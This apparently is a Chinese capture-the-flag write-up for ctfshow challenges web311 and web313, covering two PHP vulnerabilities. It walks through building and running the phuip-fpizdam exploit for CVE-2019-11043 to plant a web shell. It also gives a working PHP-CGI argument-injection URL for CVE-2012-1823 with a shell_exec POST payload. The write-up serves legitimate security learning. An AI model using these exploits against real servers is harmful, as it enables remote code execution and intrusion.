ctfshow phpCVE web311&web313

web311

这道题是一个版本漏洞
CVE-2019-11043

这个漏洞工具的使用必须要有go环境哦

php 复制代码
//创建工作空间
mkdir $HOME/go  
如果失败就rm -rf ~/go
//编辑 ~/.bash_profile 文件
vim ~/.bash_profile
//在最后一行添加下面这句。$HOME/go 为你工作空间的路径,你也可以换成你喜欢的路径
export GOPATH=$HOME/go
//保存退出后source一下(vim 的使用方法可以自己搜索一下)
source ~/.bash_profile
// 创建并进入你的第一个工程目录
mkdir -p $GOPATH/src/test && cd $GOPATH/src/test
//下载安装
git clone https://github.com/neex/phuip-fpizdam.git phuip-fpizdam
cd phuip-fpizdam
go get -v && go build
php 复制代码
如果报错如上图,执行命令切换为国内代理:
go env -w GOPROXY=https://goproxy.cn
php 复制代码
./phuip-fpizdam url/index.php 利用工具写入shell,然后密码是a并且是GET传参

web313

CVE-2012-1823

用到的cgi模式下的参数

-s 显示文件源码

-d 指定配置项

然后可以使用-d来指定 auto_prepend_file来制造任意文件漏洞,执行任意代码

php 复制代码
index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
php:input接受输入流
POST:
<?php echo shell_exec("命令");
php 复制代码
<?php
error_reporting(0);
//flag in my disk somewhere,go on!      意思是在我的磁盘somewhere 里面
echo 'where is flag?';
?>
相关推荐
m0_738120723 小时前
CTFshow系列——PHP特性Web93-96
开发语言·安全·web安全·php·ctfshow
@CLoudbays_Martin115 小时前
为什么动态视频业务内容不可以被CDN静态缓存?
java·运维·服务器·javascript·网络·python·php
learning_tom6 小时前
HTML图片标签及路径详解
linux·服务器·php
魔道不误砍柴功19 小时前
Mac 能够连Wife,但是不能上网问题解决
网络·macos·php
搬码临时工1 天前
怎样让外网计算机访问局域网计算机?通过公网地址访问不同内网服务的设置方法
开发语言·php
Fortinet_CHINA2 天前
案例精述 | 防护即智能 Fortinet赋能英科全栈安全重构实践
安全·重构·php
BingoGo2 天前
PHP Swoole/WebMan/Laravel Octane 等长驻进程框架内存泄露诊断与解决方案
后端·php
站长朋友2 天前
香港主机支持PHP版本吗
开发语言·php·香港主机php版本·php 8.4支持·wordpress主机配置·香港主机性能对比·php版本兼容性测试
腾科张老师3 天前
Telnet 原理与配置
网络·智能路由器·php
lskblog3 天前
使用 PHP Imagick 扩展实现高质量 PDF 转图片功能
android·开发语言·前端·pdf·word·php·laravel